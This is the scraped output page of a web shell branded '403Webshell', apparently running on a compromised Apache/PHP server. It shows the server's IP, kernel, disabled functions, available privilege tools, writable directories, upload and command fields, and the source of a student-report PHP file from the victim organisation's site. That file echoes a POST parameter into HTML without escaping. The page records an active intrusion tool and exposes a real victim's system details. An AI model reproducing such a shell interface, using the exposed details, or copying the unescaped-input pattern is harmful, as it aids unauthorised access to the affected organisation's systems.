403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/(Del)pathways.org.hk/MIS20140127/old20140407/student/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/(Del)pathways.org.hk/MIS20140127/old20140407/student/ajax_stu_add_report.php
<?php
include_once '../include/DBConnect.php';
$i = $_POST['i'];
$query7 = "Select assessor_id,assessor from assessor";
$result7 = $dbh->query($query7);
$result7->setFetchMode(PDO::FETCH_OBJ);
$temp='';
while ($row7 = $result7->fetch()) {
    $temp.= '<option value="'. $row7->assessor_id .'">'. $row7->assessor .'</option>';
}
echo '<tr>
                            <td>Assessed By</td>
                            <td colspan="3"><select name="assessed_by[]"><option></option>' .$temp.
 '</select></td>
                        </tr>
                    <tr>
                        <td>Date of Assessment</td>
                        <td>
                        <div class="input-append date-picker">
                                <input type="text" name="assessed_date[]" class="dateISO" required="true">
                                <span class="add-on">
                                    <i class="icon-calendar" data-date-icon="icon-calendar" data-time-icon="icon-time"></i>
                                </span>
                            </div>
                        </td>

                        <td>Diagnoses Report</td>
                        <td colspan="3">
                            <div class="fileupload fileupload-new" style="margin:0px" data-provides="fileupload">
                                    <div class="input-append">
                                        <div class="uneditable-input ">
                                            <i class="icon-file fileupload-exists"></i>
                                            <span class="fileupload-preview"><a href="diagnose_report/<? //= $attachment[$attribute]           ?>" target="_blank"><? //= $attachment[$attribute]        ?></a></span>
                                        </div>
                                        <span class="btn btn-file">
                                            <span class="fileupload-new">Select file</span>
                                            <span class="fileupload-exists">Change</span>
                                            <input type="file" name="assessed_doc' . $i . '">
                                        </span>
                                        <a href="#" class="btn fileupload-exists" data-dismiss="fileupload">Remove</a>
                                    </div>
                                </div>
                        </td>
                    </tr>';
?>

Youez - 2016 - github.com/yon3zu
LinuXploit